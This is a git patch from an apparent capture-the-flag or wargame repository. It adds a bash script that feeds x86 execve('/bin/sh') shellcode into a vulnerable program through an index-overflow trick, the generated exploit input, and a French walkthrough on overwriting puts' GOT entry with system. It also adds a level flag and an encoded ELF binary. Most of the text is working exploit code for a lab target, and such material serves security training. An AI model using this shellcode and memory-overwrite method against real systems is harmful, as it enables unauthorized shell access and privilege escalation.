From 8b91fc4f3096e6a32f4e04c8b60f0c4f7f217b43 Mon Sep 17 00:00:00 2001
From: gbrochar <gaetanbrochard@protonmail.com>
Date: Wed, 25 Jun 2025 17:41:02 +0200
Subject: [PATCH] feat: level07 + level08 elf

---
 level07/Ressources/script.sh |  45 +++++++++++++++++++++++++++++++++++
 level07/Ressources/test.txt  |  42 ++++++++++++++++++++++++++++++++
 level07/flag                 |   1 +
 level07/walkthrough          |  15 ++++++++++++
 level08/Ressources/level08   | Bin 0 -> 12975 bytes
 5 files changed, 103 insertions(+)
 create mode 100755 level07/Ressources/script.sh
 create mode 100644 level07/Ressources/test.txt
 create mode 100644 level07/flag
 create mode 100644 level07/walkthrough
 create mode 100755 level08/Ressources/level08

diff --git a/level07/Ressources/script.sh b/level07/Ressources/script.sh
new file mode 100755
index 0000000..603ec5e
--- /dev/null
+++ b/level07/Ressources/script.sh
@@ -0,0 +1,45 @@
+#!/bin/bash
+
+
+# shellcode is :
+# \x31\xc0\xb0\x46
+# \x31\xdb\x31\xc9
+# \xcd\x80\xeb\x16
+# \x5b\x31\xc0\x88
+# \x43\x07\x89\x5b
+# \x08\x89\x43\x0c
+# \xb0\x0b\x8d\x4b
+# \x08\x8d\x53\x0c
+# \xcd\x80\xe8\xe5
+# \xff\xff\xff\x2f
+# \x62\x69\x6e\x2f
+# \x73\x68
+
+IFS=''
+
+shellcode=(0x46b0c031 0xc931db31 0x16eb80cd 0x88c0315b 0x5b890743 0x0c438908 0x4b8d0bb0 0x0c538d08 0xe5e880cd 0x2fffffff 0x2f6e6962 0x00006873)
+
+bit_mask=2147483691
+
+init_addr=43
+
+for ((i = 0; i < ${#shellcode[@]}; i++)); do
+    echo "store"
+    echo "$(( ${shellcode[$i]} ))"
+	if (( (i + init_addr) % 3 == 0)); then
+    	echo "$(( i + bit_mask ))"
+	else
+		echo "$((i + init_addr))"
+	fi
+done
+
+echo "store"
+echo "$(( 0xffffd600 ))"
+echo "$(( -1040108880 ))"
+echo "read"
+
+#for i in $(seq 0 11); do
+#	echo "store"
+#	echo "${shellcode[$i]}"
+#	echo $(($i + $bit_mask))
+#done
diff --git a/level07/Ressources/test.txt b/level07/Ressources/test.txt
new file mode 100644
index 0000000..51fd68e
--- /dev/null
+++ b/level07/Ressources/test.txt
@@ -0,0 +1,42 @@
+store
+1185988657
+43
+store
+3375487793
+44
+store
+384532685
+2147483693
+store
+2294296923
+46
+store
+1535706947
+47
+store
+205752584
+2147483696
+store
+1267534768
+49
+store
+206802184
+50
+store
+3857219789
+2147483699
+store
+805306367
+52
+store
+795765090
+53
+store
+26739
+2147483702
+store
+4294956544 (-16 pour le vrai 28 au lieu de 44)
+-1040108880
+store
+42
+42
diff --git a/level07/flag b/level07/flag
new file mode 100644
index 0000000..73271cc
--- /dev/null
+++ b/level07/flag
@@ -0,0 +1 @@
+7WJ6jFBzrcjEYXudxnM3kdW7n3qyxR6tk2xGrkSC
diff --git a/level07/walkthrough b/level07/walkthrough
new file mode 100644
index 0000000..d2481d0
--- /dev/null
+++ b/level07/walkthrough
@@ -0,0 +1,15 @@
+-1040108880On peut ecrire que 8 octets sur 12
+
+"/bin/sh" c'est 8 char avec le '\0' donc ok pour le modulo
+"/bin" => 0x2F62696E => 794978670
+"/sh\0" => 0x2F736800 => 796092416
+
+
+system on peut le call avec l'addresse, puis l'argument vers esp+quelque chose.
+
+-1040108880 Index a store avec 4159090384 (0xf7e6aed0 ou system)
+ca override le plt/got de puts
+
+
+
+override esp pour avoir le bon argument format addr de system BLANC (modulo 3) addr de /bin/sh
diff --git a/level08/Ressources/level08 b/level08/Ressources/level08
new file mode 100755
index 0000000000000000000000000000000000000000..49adcdb1c5506d015dc58fcea06feecc3ed1701e
GIT binary patch
literal 12975
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

literal 0
HcmV?d00001